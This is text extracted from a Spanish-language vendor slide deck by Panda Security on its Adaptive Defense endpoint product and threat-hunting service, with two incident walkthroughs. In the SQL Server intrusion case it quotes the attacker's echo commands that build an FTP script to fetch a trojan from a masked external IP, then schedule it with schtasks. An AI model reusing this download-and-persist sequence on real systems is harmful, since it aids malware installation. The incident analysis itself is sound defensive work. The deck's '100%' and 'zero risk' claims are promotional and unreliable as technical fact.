shinue salas perez - infosecurity mexico...resumen de beneficios ligero. despliegue rapido, roi...

Shinue Salas PerezPanda Security

TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloCONOCER EN DONDE RESIDE LA RIQUEZA DE LAS

ORGANIZACIONES, PODRÁS DEFINIR UNA ESTRATEGIA DE

PROTECCIÓN PARA CADA ELEMENTO POR MUY PEQUEÑO

QUE PAREZCA.

RIQUEZA La riqueza en las naciones Históricamente

Ciudadanos & Territorioinsignificante

Ganado + Agricultura + Industria

Territorio + Personas

La riqueza en las naciones en la Actualidad

PROTAGONISTA El factor Humano

ACTORES Atrás quedaron los días de los virus y gusanos…

TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloLA CIBERSEGURIDAD NUNCA TIENE UN COSTO MAYOR QUE

EL DAÑO QUE PODEMOS SUFRIR.

INVERSIÓNAsegurar el Endpoint es el punto de partida.

Amenazas de Red Amenazas en el Endpoint

Ataques se enfocan

en el perímetro.

31% Inversión

de Seguridad

89%Ataques se enfocan

en el Endpoint.

69% Inversión

de Seguridad

11%

PLATAFORAS TECNOLOGICASPROTEGIENDO AL USUARIOEl enfoque tradicional de protección no funciona más

No funciona más.

Detección – Respuesta

Firmas Detección

Sigilozas – “Indetectables”

RETOSAyudando a las empresas a ser mas resistentes

TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloAQUELLOS QUE NO SON CONSCIENTES DE LA DESVENTAJA

DE SERVIRSE DE SUS RECURSOS NO PUEDEN SER TOTALMENTE

CONSCIENTES DE LAS VENTAJAS PARA UTILIZARLOS A SU

FAVOR.

CAMBIANDO EL ENFOQUE

La Triada Perfecta

PLATAFORMA TECNOLÓGICAS

Protegiendo al

usuario sin importar

donde resida.

Agente ligero – Cloud Computing

EVENTOS

Clie

nte

s

Eventos Almacenados

Histórico

Flujo de Eventos

• Procesos• Creación• Injection

• Archivos• Creación• Modificación• Apertura

• Comunicaciones• IPs Origen y Destino• URLs de Descarga

• Registro• Creación• Modificación

• H. Administrativas• Instalación• Actividad

Un nuevo enfoque para la seguridad de Endpoint

AUTOMATIZACION PROCESOS

PARADIGMA PREVALECE

… se basa en detección puntual solo de

procesos maliciosos conocidos, significa:

• Toda actividad sospechosa tiene que

investigarse caso por caso.

• Todos los procesos desconocidos estan

permitidos. Los atacantes burlan fácilmenteeste modelo.

Sospechoso

Malware

Desconocido

Mayor Riesgo

Mayor Esfuerzo

• El resultado es una mayor tasa de

éxito en los ataques.

Enfoque tradicional del Endpoint

NUEVO PARADIGMA100% Attestation Service

Esta basado clasificación de todos los procesos en

ejecución en su red.

• Actividad de todos los programas es

monitorizada y analizada en tiempo real.

• Todo comportamiento verificado por un servicio

gestionado, los administradores no investigannada.

• Mayor nivel de protección con menos esfuerzo.

Sospechoso

Malware

Desconocido

Riesgo Cero

Goodware

100% Procesos

Clasificados . Servicio Gestionado

Visibilidad Tiempo Real & Analisis Forense

• No se puede ejecutar una aplicación al

menos que sea confiable.

Misión: Ejecución de binarios Certificados por PandaNo es mágia. Visibilidad, Conocimiento y Automatización

Comportamiento, Análisis contextual, ML

Cloud determina binaries, tiempo real

Todos binarios clasificados (MW/GW)

El Servicio classifica el 100% de los binarios

Endpoint NO se ha VISTO infectado por

malware

El Servicio es parte de la solución:- No add-on, sin costos ocultos- No delega tareas adicionales- No alertas abrumadoras

Inteligencia Colectiva - Nube

Repositorio MW&GW

Binario: 10,000 atributos

PERSONAS SERVICIOS

Threat Hunters

Plataforma Inteligente Global Big Data un medio Supervisa Continuamente

Big Data para un fin. Internos o Externos.

THREAT HUNTING Servicio de Adaptive Defense

Monitoriza continuamente el Sistema para identificar ataques de seguridad.

Encuentra ataques que no usan malware.Beneficios

Detección de Hackers• Ataques de nueva generación o sin malware.

• Movimientos Laterales

Identificación de empleados maliciosos

• Modelado de comportamiento de usuario: User

Attestation.

• Control de identidad: Control del dato.

Misión: Buscar y Responder a los atacantes

¿Por qué el Servicio de Threat Hunting?

Ataques Malwareless – herramientas

administrativas - evaden las tecnologías de

seguridad.

El Servicio de Threat Hunting de forma PROACTIVA

detecta ataques sin malware y/o en etapas

tempranas del ciberataque, antes de que

PRODUZCAN daños y pérdidas.

Threat Hunting

SOLO ES POSIBLE SI LA ORGANIZACIÓN TIENE

Tecnologías, Personas y Procesos

PANDA ADAPTIVE DEFENSE

Prevención

Confiabilidad de Aplicación

Aplicaciones ConfiablesElimina el gap de detección

Detección

Trazabilidad Total

Monitorización Real (no sandboxing)

Análisis Forense

Integración con SIEM

RespuestaGestión

Compatible con otros productos de

seguridad

Instalación Inmediata y sencilla

Gestionado: Llevado a cabo por analistas de

Panda

Desatendido: Alertas confirmadas.

Servicio

TÍTULO TÍTULO TITULOSubtítulo Subtítulo Subtítulo

EXPONIENDO AL ENEMIGO

"SI CONOCES AL ENEMIGO Y TE CONOCES A TI MISMO, NI EN CIEN BATALLAS CORRERÁS PELIGRO. SI TE CONOCES A TI MISMO PERO NO CONOCES AL ENEMIGO, PERDERÁS UNA BATALLA Y GANARÁS OTRA".

SUN TZU

Reconocimiento Preparación Entrega Explotación Instalación

Comando y

Control (C&C)Acciones en

el objetivo

Adaptive Defense

Modo LearningNo hay bloqueo, monitoriza

todo lo ejecutado.

Ataque explicado siguiendo el modelo de Cyber Kill Chain

Threat Hunting Cyber Kill Chain

Entrega ExplotaciónEntrega• Spear Phishing

• Vector de entrada eficaz.

• Cinco trabajadores seleccionados en la fase

de reconocimiento reciben un correo con

una URL en el cuerpo del mensaje.

• Cinco acceden a la URL.

• Dos descargan un fichero HTA (html + script).

Explotación

• Los dos usuarios que ejecutan el script se

infectan:

• Inyecta una shellcode maliciosa (MW)

en ciertos procesos confiables (GW).

Threat Hunting Cyber Kill Chain

Instalación

Instalación

• Reconocimiento: el proceso se conecta a un

C&C y sube información del equipo

(nombre, dominio, grupos de dominio,

configuración de red, información de

hardware…).

• Uno de los dos usuarios no es interesante

para los atacantes, no movimientos laterales

con él y no continúan el ataque.

• El segundo usuario infectado, descarga un

script de powershell en memoria.

• Robar credenciales del equipo.

• Envía a su C&C.

• Descarga un par de troyanos/backdoor.

• Instala alrededor de 20 equipos de la red de

forma remota con las credenciales robadas

(movimiento lateral).

Threat Hunting Cyber Kill Chain

Comando y

Control (C&C)Acciones en

el objetivo

C & C

• Se ejecutan los troyanos/backdoors en los 20 equipos.

• Se conectan al C&C.

• Abren Shell remotas para que el

atacante tome el control.

• El atacante puede ejecutar en todas

las máquinas.

Acciones en el objetivo:

• Crea un túnel inverso y conectándose a otro

servidor para extraer información.• Roba información de ciertas máquinas de la red.

Threat Hunting Cyber Kill Chain

Reconocimiento Preparación Entrega Explotación Instalación

Comando y

Control (C&C)Acciones en

el objetivo

Adaptive Defense

Modo Learning

No hay bloqueo, monitoriza

todo lo ejecutado.

Investigación:

• El equipo de Threat Hunting investiga el ataque y

determina que e trata de un Red Team de otra

empresa de seguridad.

• Se informa al cliente de la actividad del Red Team.

Conclusión

Threat Hunting Cyber Kill Chain

Incremento del número de conexiones.La mayoría provienen de la misma región.

Descubrimiento

Threat Hunting: Intrusión de servidor SQL

Resumen

Servidor de Base de Datos: SQL Server 2008 R2 (RTM).

SQL Server expuesto a Internet y comprometido por un atacante.

Fuerza bruta obtiene las credenciales del Servidor SQL.

Malware para comunicarse a su Centro de Comando & Control

(BOTNET).

Creación de tareas programadas para ejecutar Script/Malware.

Threat Hunting: Intrusión de servidor SQL

Investigación: El Servidor es comprometido

Shell SQLServer, podría ejecutar comandos:

Cambios en el registro del SO

Creación de un archivo .ini con comandos echo

Inicia el archivo ini con comando FTP -s y

también p.exe (una copia de FTP.exe antes)

Diferentes técnicas para obtener el troyano

zd.exe desde la IP Externa

Programa una tarea para iniciar periódicamente

el troyano con el comando schtasks.exe

Threat Hunting: Intrusión de servidor SQL

Análisis: Script – Malware – IP Externa

echo open XXX.XX.XX.XXX > c:\Windows\Vl1433.iniecho XXX>> c:\Windows\Vl1433.iniecho XXX>> c:\Windows\Vl1433.iniecho binary >> c:\Windows\Vl1433.iniecho get zd.exe c:\zd.exe>> c:\Windows\Vl1433.iniecho bye >> c:\Windows\Vl1433.ini

Version Info

FileDescription 微软雅宋冬青黑体

FileMajorPart 1

FileMinorPart 0

FilePrivatePart 215

FileVersion 1, 0, 0, 215

InternalName

Language Chino (simplificado, China)

LegalCopyright Copyright (C) 2016 华文细黑

OriginalFilename

ProductMajorPart 1

ProductMinorPart 0

ProductName 微软雅宋冬青黑体

ProductPrivatepart 215

ProductVersion 1, 0, 0, 215

Threat Hunting: Intrusión de servidor SQL

Hipótesis – Indicadores de Ataque

Threat Hunting: Intrusión de servidor SQL

TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloLAS VICTORIAS NO SE DEBEN A LA SUERTE, SINO HABERSE SITUADO

PREVIAMENTE EN LA POSICIÓN DE GANAR CON SEGURIDAD, IMPONIENDOSE SOBRE LO QUE YA HAN PERDIDO DE ANTEMANO.

Panda Adaptive DefenseResumen de beneficios

Ligero. Despliegue

rapido, ROI corto plazo.

Integra Prevención,

Detección, Respuesta y

Servicios Gestionados

Visibilidad del pasado

y presente de la

actividad del Endpoint

Se adapta a la evolución de

ataques basado en archivos,

memoria y sin malware.

Asegura la confiabilidad del

proceso.

Detecta y Responde a hackers y

usuarios mal ntencionados.

Maximiza Prevención,

Minimiza el tiempo para

Detectar y Responder.

Reduce TCO.

Análisis de Causa Raíz,

detección de anomalías y

reducción de la superficie

de ataque.

No es delegado al

administrador, sin interupción.

Alertas confirmadas.

Solución 100% Cloud.

Tecnologías locales,

Plataforma de Big

Data, ML Cloud.

100% Attestation Service Threat Hunting & Investigation Service

#PandaenInfosecurity

TÍTULO TÍTULO TITULOSubtítulo Subtítulo SubtítuloGRACIAS